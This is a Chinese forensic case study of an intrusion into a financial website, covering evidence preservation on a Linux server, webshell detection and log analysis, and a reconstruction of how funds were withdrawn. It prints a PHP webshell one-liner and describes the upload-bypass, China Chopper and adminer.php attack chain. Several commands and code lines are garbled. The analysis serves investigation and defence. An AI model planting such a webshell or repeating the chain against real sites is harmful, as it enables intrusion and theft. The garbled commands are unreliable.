非法获取计算机信息系统数据罪-计算机入侵事件是如何取证？

非法获取计算机信息系统数据罪-计算机入侵事件是如何取证？


一、事件简介

某金融网站称：其注册会员的账户内的财产，在用户不知情的情况下被提现，但网站查证后发现并不是用户自身所为。值得注意的是，提现过程中使用的银行卡并非是用户名下真实存在的银行账户。根据现有信息推测，其计算机可能被非法人侵，网站数据被篡改，损失达上百万。

二、数据固定

数据固定是分析的前提，在固定过程中要兼顾数据原始性、完整性、可复现，可控制的原则。以下对该Linux服务器的固定过程进行详细描述。

1.目标信息
网站部署在阿里云上，使用的是Linux操作系统，受害者提供了被人侵计算机的IP和登录凭据。

2.基本信息固定
执行“history>history.log”导出历史命令；
执行“last>last.log”导出登录相关信息;
执行“lastb>lastb.log”导出登录失败信息;
执行“lastlog>lastlog.log”导出所有用户的最后一次登录信息；
执行“tarczvf/var/logvarlog.tar.gz”将/var/log整个目录打包；
执行“ps-AUX〉ps.log”导出进程信息；
执行“netstat-atunp>netstat.log”导出网络连接信息;

3.网站数据固定

(1)目录固定
根据网站应用配置文件可知，网站目录为“/www/c****i”，执行“tarczvf/www/c*****iwww.c*****i.com.tar.gz”将网站目录保存；

(2)访问日志固定
根据网站应用配置文件可知，访问日志保存位置在：“/etc/httpd/logs”，执行“tarczvf/etc/httpd/logsaccesslog.tar.gz”将网站访问日志保存。
为了确保日志的完整性，执行此命令前应该停止网站应用进程，否则日志文件会因网站应用进程锁定日志而无法读取：

4.数据库固定

(1)数据表固定
在网站目录内找到数据库连接配置文件，将网站数据库导出为“database.sql’，0

(2)数据库日志固定
根据Mysql数据库配置信息，将所有日志文件进行提取固定。

三、数据分析

1.系统日志分析
固定工作完成后，首先对固定的基本信息进行分析，未发现明显异常，排除暴力破解系统用户登录的入侵方式：

2.网站应用分析

(1)网站重构
安装Apache、PHP和Mysql,将固定的数据导人，使用Web浏览器访问后，网站首页成功展示。

(2)WebShell扫描
使用WebShell分析工具执行扫描，在网站目录下发现一个名为“up1oad****?php.bmp”的疑似网页木马的文件。

(3)WebShell分析
使用编码工具查看该文件后，发现存在以下代码“<?php@assert(base64_decode($P0ST[h31en]))?>”其含义是对post提交的h31en变量中的内容执行base64解码。
根据文件修改时间查找近似的文件，定位到符合条件的php代码页“adminer.php”，打开发现此页面的功能为数据库管理器，可以执行数据库管理动作。

通常情况下，网站管理员并没有在Web页上修改数据库的需求，结合文件创建时间分析，可以确定此页面是人侵者为了远程操控数据库而特意留下的接口。

3.网站访问日志分析
接下来从网站的访问日志人手，在日志中筛选出所有“adminer.php”页面的访问记录，并统计所有“adminer.php”页面访问记录中出现的“userjd”，得到4个用户的ID:t4$grep-E-i-o"user_id%5d=[e-9]{1,8}"adminer.php.
exclude.alibaba.log|sort|uniq
user_id%5D=1392
user_id%5D=1679
userid%5D=2613
user_id%5D=6248”

四、入侵还原

根据数据分析环节结果，接下来对整个入侵过程进行还原:

1.恶意文件上传
入侵者首先利用网站的文件上传漏洞，将含有恶意内容的PHP代码页，修改文件头部，伪装成BMP图片，成功绕过网站代码检测机制，并上传至网站的目录下；

2.确认上传文件证据
在网站对应目录找到上传成功的恶意代码文件“uploaddyp2p.php.php”，可见上传行为有效;

3.连接计算机
使用“chopper”工具连接此网站内的恶意代码页，连接成功后使用集成的文件管理器成功打开网站所在计算机的根目录，并获得管理权限；

4.上传数据库管理器
使用“chopper”工具集成的文件管理器，上传数据库管理器代码页“adminer.php”，读取数据库连接配置文件“/data/www/c*****i/dbconfig.php”，取得数据库权限。

5.修改数据
访问“adminer.php”页，篡改数据库数据，绑定银行卡；

6.执行提现
访问提现页，执行提现操作，成功将用户财产非法获取。